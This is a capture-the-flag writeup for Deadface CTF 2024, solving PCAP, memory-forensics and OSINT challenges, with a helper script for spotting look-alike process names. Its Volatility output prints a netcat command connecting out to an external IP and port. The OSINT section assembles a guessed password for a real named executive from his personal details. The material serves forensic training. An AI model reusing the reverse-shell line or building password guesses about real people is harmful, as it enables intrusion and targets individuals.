Deadface CTF 2024

Deadface CTF 2024 Writeup


Forensic challenges

Big Fish

PCAP analysis:

Wireshark > Export Object > HTTP

Netcat is downloaded after the POST request to notice.html

flag{45.55.201.188}

Password

PCAP Analysis:

flag{S4rt0RIS19&&}

Suspicious Sender

Content of frame 13010:

please follow the on-screen instructions to update the agent and ensure your system is compliant with company standards.</p>

             <p>If you encounter any issues or require assistance, feel free to contact our IT support team.</p>

             <p>Thank you for your attention to this matter.</p>

             <p>Sincerely,</p>

             <p><strong>William Hadderly</strong><br>IT Support Manager<br>Techno Global Research Industries</p>

         </div>

         <div class="email-footer">

             <p>© 2024 Techno Global Research Industries. All rights reserved.</p>

         </div>

     </div>

</div>

</body>

</html

flag{William Hadderly}

Traffic Analysis

Wild Wild West

PCAP analysis

Export SMB objects - Deadface.txt

flag{kerbrute_finding_users}

Phantom Operation

Right Time

Memory forensics:

$ volatility3 -f physmem.raw windows.info

<-SNIP->

SystemTime 2024-10-06 23:38:00

flag{2024-10-06 23:38:00+00:00}

Bad Processes

Flag = PID of the malicious process executed by the victim

$ volatility3 -f physmem.raw windows.pslist

11516 8460 1sass.exe 0xe7878358b080 1 - 1 True 2024-10-06 23:26:52.000000 N/A Disabled
11532 11516 cmd.exe 0xe78783749080 1 - 1 True 2024-10-06 23:26:52.000000 N/A Disabled
11540 11532 conhost.exe 0xe7878387f080 3 - 1 False 2024-10-06 23:26:52.000000 N/A Disabled
11332 628 svchost.exe 0xe7878178b080 10 - 0 False 2024-10-06 23:30:50.000000 N/A Disabled
12260 11532 945f.exe 0xe78781691080 1 - 1 True 2024-10-06 23:36:41.000000 N/A Disabled
11828 628 svchost.exe 0xe7877f9da080 4 - 0 False 2024-10-06 23:37:08.000000 N/A Disabled

1sass.exe and 945f.exe

volatility3 -f physmem.raw windows.pstree

<-SNIP->
  
*** 8460 4108 winupdate.exe 0xe78781c2a080 2 - 1 False 2024-10-06 23:26:47.000000 N/A \Device\HarddiskVolume2\Users\garry\Downloads\update\winupdate.exe "C:\Users\garry\Downloads\update\winupdate.exe" C:\Users\garry\Downloads\update\winupdate.exe

**** 11516 8460 1sass.exe 0xe7878358b080 1 - 1 True 2024-10-06 23:26:52.000000 N/A \Device\HarddiskVolume2\Windows\Temp\1sass.exe "C:\Windows\Temp\1sass.exe" C:\Windows\Temp\1sass.exe

***** 11532 11516 cmd.exe 0xe78783749080 1 - 1 True 2024-10-06 23:26:52.000000 N/A \Device\HarddiskVolume2\Windows\SysWOW64\cmd.exe cmd C:\Windows\SysWOW64\cmd.exe

****** 12260 11532 945f.exe 0xe78781691080 1 - 1 True 2024-10-06 23:36:41.000000 N/A \Device\HarddiskVolume2\Users\garry\945f.exe .\945f.exe  45.55.201.188 7523 C:\Users\garry\945f.exe

<-SNIP->

Netcat connects out on port 7523 after an LSASS dump launched by winupdate.exe (PID 8460).

flag{8460}
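An added check, not part of the writeup, that automates the reasoning above over the quoted pslist rows: it parses the PID/PPID/ImageFileName columns, flags image names that match a protected system binary only after folding look-alike characters (1sass.exe for lsass.exe), and walks the parent chain from the netcat process back to the user-launched binary. The sample rows are constructed from the output shown on this page (the winupdate.exe row is taken from the pstree output).

```python
from typing import Dict, List

# Constructed sample: the windows.pslist rows quoted in the writeup, plus the
# winupdate.exe row from its windows.pstree output (columns: PID PPID ImageFileName ...).
PSLIST = """\
8460 4108 winupdate.exe 0xe78781c2a080 2 - 1 False 2024-10-06 23:26:47.000000 N/A Disabled
11516 8460 1sass.exe 0xe7878358b080 1 - 1 True 2024-10-06 23:26:52.000000 N/A Disabled
11532 11516 cmd.exe 0xe78783749080 1 - 1 True 2024-10-06 23:26:52.000000 N/A Disabled
11540 11532 conhost.exe 0xe7878387f080 3 - 1 False 2024-10-06 23:26:52.000000 N/A Disabled
11332 628 svchost.exe 0xe7878178b080 10 - 0 False 2024-10-06 23:30:50.000000 N/A Disabled
12260 11532 945f.exe 0xe78781691080 1 - 1 True 2024-10-06 23:36:41.000000 N/A Disabled
"""

# System binaries that malware imitates by swapping look-alike characters (1/l, 0/o, |/l).
PROTECTED = {"lsass.exe", "svchost.exe", "csrss.exe", "services.exe", "explorer.exe"}
HOMOGLYPHS = str.maketrans({"1": "l", "0": "o", "|": "l"})


def normalize(name: str) -> str:
    """Lower-case the image name and fold common homoglyphs to their letter."""
    return name.lower().translate(HOMOGLYPHS)


CANONICAL = {normalize(n): n for n in PROTECTED}


def parse_pslist(text: str) -> Dict[int, dict]:
    """Map PID -> {ppid, name}; header and <-SNIP-> lines are skipped."""
    procs = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) >= 3 and parts[0].isdigit() and parts[1].isdigit():
            procs[int(parts[0])] = {"ppid": int(parts[1]), "name": parts[2]}
    return procs


def lookalikes(procs: Dict[int, dict]) -> Dict[int, str]:
    """PIDs whose image name equals a protected binary only after homoglyph folding."""
    return {pid: CANONICAL[normalize(p["name"])] for pid, p in procs.items()
            if p["name"].lower() not in PROTECTED and normalize(p["name"]) in CANONICAL}


def ancestry(procs: Dict[int, dict], pid: int) -> List[int]:
    """Follow PPID links from pid up to the oldest ancestor present in the listing."""
    chain, seen = [], set()
    while pid in procs and pid not in seen:
        seen.add(pid)
        chain.append(pid)
        pid = procs[pid]["ppid"]
    return chain


if __name__ == "__main__":
    procs = parse_pslist(PSLIST)
    print("masquerading:", lookalikes(procs))            # {11516: 'lsass.exe'}
    print("chain from 945f.exe:", ancestry(procs, 12260))  # [12260, 11532, 11516, 8460]
```

The last element of the chain is the user-launched process (its parent is not in the listing), which is the PID the challenge asks for.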

System Information

The attacker obtained the victim's system information; identify the file where this information was stored.

$ volatility3 -f physmem.raw windows.filescan

<-SNIP->

0xe78782eabca0 \Windows\Temp\sysinfo.txt 216

<-SNIP->

flag{C:\Windows\Temp\sysinfo.txt}

OSINT

A hacker group claims that they were able to identify Albert Bourla's password by looking into his background.

The flag format is flag{pet dog's name1*thesis publication year$pet dog's name2+Golden Cross of the Order of the Redeemer receipt date (MM-DD-YYYY)}

Dog's name:

Golden Cross of the Order of the Redeemer:

“On April 5, 2022, Chairman and CEO of Pfizer Albert Bourla was honored with Greece's top civilian award for his efforts in developing a life-saving COVID-19 vaccine. Greek President Katerina Sakellaropoulou presented Dr. Bourla with the Golden Cross of the Order of the Redeemer,”

Thesis publication year:

“Bourla's doctoral thesis (1991) is titled "Effect of melatonin implants on”

flag{charlie*1991$Simba+04-05-2022}
